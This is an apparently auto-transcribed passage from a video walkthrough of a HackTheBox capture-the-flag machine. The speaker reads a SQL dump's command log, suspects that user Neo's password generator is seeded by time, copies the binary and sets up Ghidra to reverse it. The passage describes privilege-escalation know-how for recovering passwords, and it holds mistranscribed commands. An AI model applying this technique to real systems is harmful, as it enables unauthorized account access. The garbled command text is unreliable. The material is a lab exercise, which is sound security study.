the name mirs. There we go. And there we go. We're on the host box now and there is user.ext. If we do a pseudo-l, it requires the password. We don't know Morpheus's password, so we can't really do anything there. If we go back to like um all the SQLite stuff, actually not SQLite, um the SQL dump. But before I do that, if we look at home, there is a Neo user. If we go in Neo, we can't. But what I was saying is let's see let's go back to um SQL. Let's see what is this as local share SQL map. Awesome uh output as host dump and this should give us all the tables. Let's see temp. Okay. Command log.csv. So we can see the command log. was all the SQL commands that were run but they went to CD home neo and they used this neo password generator and if we go to this box let's see cd/op there is a neo password generator and if we run this we get a random password every time we run it. So if we echo dash n oops birth this n wc- c it has to be 20 characters. So we have them going in running the password and we also have the time they ran this command. And one of the big vulnerabilities with password generators is just an insecure use of like a seed. So maybe if they just use the seed based upon this time, we'll be able to create another program that mimics how they generate the password. Set the time to this exact second, run the command, and then get the password. So let's go over here. Let's see. Um, let's just copy this. So let's do SCP- I Morpheus Morpheus at white rabbit.htb htb opt neo password generator. Just copy this here. Hopefully that works. There we go. It's copying. So, let's open up opt. I should have gedra, right? Maybe I don't have gedra installed. Um, I'm going to go ahead and install gedra real quick so we can reverse this. Or maybe I can do it on video. It shouldn't take too long. Download Gedra. I'm really surprised that's not on my box. Let's see. Go over here. I don't know if I want Gedra Light. When do they have Gedra and Gedra Light? I am so confused. Okay, download from GitHub. What's new? Let's download the zip. Save it. I really thought I had Gedra installed, but I guess not. That should be done downloading in a second. Move downloads. GRA 12 zero public.zip. Is it done? It is. D I GRA. Oh, I don't have permission in the op directory. So, let's do pseudo uh maker gedra. pseudo 7zx. Unzip it. I'm so confused that why I don't have it. Okay. Go in Gedra. Gedra run. And hopefully there's no Oh man, I have to install the JDK. I'm just going to pause the video and we will get this working. Okay, so this is the JDK I installed. It's not the one I normally do, but I couldn't find Open JDK 21 on the version of Parrot I'm running, so